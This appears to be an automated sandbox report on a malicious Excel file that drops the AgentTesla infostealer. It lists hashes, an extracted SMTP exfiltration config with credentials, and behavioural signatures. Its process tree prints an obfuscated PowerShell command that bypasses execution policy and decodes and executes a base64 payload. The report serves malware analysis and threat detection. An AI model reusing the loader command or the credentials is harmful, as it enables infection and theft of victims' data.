Analysis
- max time kernel: 121s
- max time network: 129s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 20/07/2024, 09:55
Static task: static1
Behavioral task: behavioral1
- Sample: 5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
- Resource: win7-20240705-en
Behavioral task: behavioral2
- Sample: 5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
- Resource: win10v2004-20240709-en
General
- Target: 5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
- Size: 118KB
- MD5: b363a9de28fa08d52fd1bcbe66b62177
- SHA1: 4d76d82d397c088d68038414bcc945c7e62fef9f
- SHA256: 5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d
- SHA512: ecbc3d03d4c30a1d85ecbde1fdbc262c41e90743117d9f407676eaf03ee61fdd227699e4b4adcbc0aa15856b1c85dee5f2fd66548aa96c9f56306da424fe670c
- SSDEEP: 1536:HtZjb5CNvDUyPILbqcH1pxt3HrsbDMTXLMEBun3OJdvc3hZPGgqGa:HPj9cgBbq6xtXIbYwEQ3OnvWHPG
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Host: us2.smtp.mailhostbox.com
- Port: 587
- Username: [email protected]
- Password: Password: rB^PG*h 6.
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Blocklisted process makes network request (2 IoCs)
  flow 11, pid 2860, mshta.exe
  flow 13, pid 2636, powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  pid 1044, winiti.exe
  pid 2432, winiti.exe
- Loads dropped DLL (1 IoC)
  pid 2636, powershell.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe" (winiti.exe)
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 14, api.ipify.org
  flow 15, api.ipify.org
  flow 16, ip-api.com
- Drops file in System32 directory (1 IoC)
  File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- Suspicious use of SetThreadContext (1 IoC)
  PID 1044 set thread context of 2432 (winiti.exe, target 40)
- Detected phishing page
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Enumerates system info in registry (2 TTPs, 1 IoC)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor (EXCEL.EXE)
- Modifies Internet Explorer settings (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid 3048, EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid 2636, powershell.exe (x3)
  pid 1044, winiti.exe (x2)
  pid 2432, winiti.exe (x2)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege, pid 2636, powershell.exe
  Token: SeDebugPrivilege, pid 1044, winiti.exe
  Token: SeDebugPrivilege, pid 2432, winiti.exe
- Suspicious use of SetWindowsHookEx (5 IoCs)
  pid 3048, EXCEL.EXE (x5)
- Suspicious use of WriteProcessMemory (29 IoCs)
  PID 2860 wrote to memory of 2772 (mshta.exe, target 33) x4
  PID 2772 wrote to memory of 2636 (cmd.exe, target 35) x4
  PID 2636 wrote to memory of 1588 (powershell.exe, target 36) x4
  PID 1588 wrote to memory of 1732 (csc.exe, target 37) x4
  PID 2636 wrote to memory of 1044 (powershell.exe, target 39) x4
  PID 1044 wrote to memory of 2432 (winiti.exe, target 40) x9
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 3048)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5bf939a5ebe508171529552a5d1495f495393ebb08eb87c08ac1f5fb9e0f941d.xls
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\mshta.exe (PID 2860)
  Command line: C:\Windows\SysWOW64\mshta.exe -Embedding
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 2772)
    Command line: "C:\Windows\system32\cmd.exe" "/C POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'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'+[chAR]34+'))')))"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2636)
      Command line: POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'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'+[chAR]34+'))')))"
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 1588)
        Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8up2kuy1.cmdline"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 1732)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9D3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE9D2.tmp"
      - C:\Users\Admin\AppData\Roaming\winiti.exe (PID 1044)
        Command line: "C:\Users\Admin\AppData\Roaming\winiti.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Roaming\winiti.exe (PID 2432)
          Command line: "C:\Users\Admin\AppData\Roaming\winiti.exe"
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK27LCMU\bqrp4j[1].htm
  Filesize: 75B
  MD5: f5aa5c15ce9558011d53a5b7700f8209
  SHA1: 082c8304d8093782c6036151672e903e0715a869
  SHA256: 8f2b99b41702d67ec68678a193cf21e7be375e6f8552b3673d4b8adf3cd86fe9
  SHA512: 530dc5cf8f0b5b2988aa35e91dc35995a434dc8e82bbacea5635c5cb876e0b8cc1596300327cf6d495acd27b10cc366c5ce152033aa9cb2d929efe5a7810805a
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z2D3H3V6\bqrp4j[1].htm
  Filesize: 168B
  MD5: d57e3a550060f85d44a175139ea23021
  SHA1: 2c5cb3428a322c9709a34d04dd86fe7628f8f0a6
  SHA256: 43edf068d34276e8ade4113d4d7207de19fc98a2ae1c07298e593edae2a8774c
  SHA512: 0364fe6a010fce7a3f4a6344c84468c64b20fd131f3160fc649db78f1075ba52d8a1c4496e50dbe27c357e01ee52e94cdcda8f7927cba28d5f2f45b9da690063
- Filesize: 3KB
  MD5: 205e27169156054632cc11269357c59c
  SHA1: c4c9b6100486e022c8778b71573c6621d21e1ed8
  SHA256: ff5ba91a96c64607e62146c1cd4a2a7b66a0633b00e0ec8037603030feffcf12
  SHA512: 30f7939ce8377eb3cbc9b69fe665024f3c454a343bd5c5f96983ff41491b6224d46cfa47e3dd561ca5825a81854d187b41069dd08c9f84cce85fb4c051625505
- Filesize: 7KB
  MD5: 2ec3684debec23ce3620a183635b6e1e
  SHA1: 83ee7ea91d4cb875f41e0806d085a7f313ea9b34
  SHA256: 6e6d1ece8e3d1495752af7121c0583a70c7c75f64a4f781b061313862e629751
  SHA512: 051867259773a466dd1837b07fc53d345d18bc24c7860bf718ef951266f6806758682c541282e48fd964be3385070c3a726935bb73699d5bd5b917de2119c0f4
- Filesize: 1KB
  MD5: 8c5ef15d9ff9a902c87ce02dc3b53bc8
  SHA1: 47e203a63ae42cc9e089babcad96c938232ffe7a
  SHA256: 5c70642b95a26f7d5bca2432ea24ee7b41f2eacbdab6a7ae0e303f9fbe2915aa
  SHA512: 5abde99629f366ac9315d174319498fb51e9dd856a7ff89fc7215b0f3e94c2dac402c510ad21bf0a2a4774e652863efa63aa51e68e517e4f57cf45d0a29b6162
- Filesize: 906KB
  MD5: f077adcb2d6ea5208dc2b37f94d21fc8
  SHA1: 2fd52d3fb6b982bb64afd1165836f911ac82a40e
  SHA256: 6af79d96f93fecf5182be2b0dbadb8a0874fb4bcdded73478252ccec2f48f05f
  SHA512: 81a3b1416e9780b2c25ab381742ebac09200932d7b21fd8546f4d455439e5c1bbdac7c3faff9f48945064c04b941d1c237dba55d53687445d456a855bce0dd07
- Filesize: 468B
  MD5: 7734075c50835dd0aa579997b1feacfd
  SHA1: b2b42485dfcf88999d6780c0f1aa88e638081515
  SHA256: 9ef8ccd491530f4be74ad14c37d6c10b340045ac58c8bf65cc41c0766552a0e3
  SHA512: 0350ef6f6c01260409dbda7da5a3873b5ee760d02c93c98cb8b6415685b5a4d37013b5c0822e8b85a85b8d14df7224a9b9d3f7d1145330f795a7c9be682ae82e
- Filesize: 309B
  MD5: b8846de9d7dc1ad32e3cdd3b70cda506
  SHA1: eaba4994e87638e36e64b1d8ae40ab82acc3de2e
  SHA256: 23679c623b8659c2300cbb1af381d95bbac3b204a3975c7c83ca44abc8d94f9a
  SHA512: 9f3d460b553826850a3ef2eed873f5529840878f7eba19bd12f2d7d0d3fc12a39cab1c93bf3f2a8ff4dcab6b62fce5c589ccfc30d953fc1c3fa9d2267a97620e
- Filesize: 652B
  MD5: 28fd46d577ed4f3e89d0718c11e4d23e
  SHA1: 0bdce8b570158912d1202cd7ae688d6a1a7e7235
  SHA256: bc73dbc0d4d46ea14bd657a14561b06a6d3f8b1b89c3857fe80b96eab2bc78f7
  SHA512: d80340864cbb27a0d6b9180d9955a66a09825dd7cb160058d4f832b74cc27465e9b4fb22346ec43df56644c7457d4aede85d13c03b56dc2e7d0f7d119c69ae89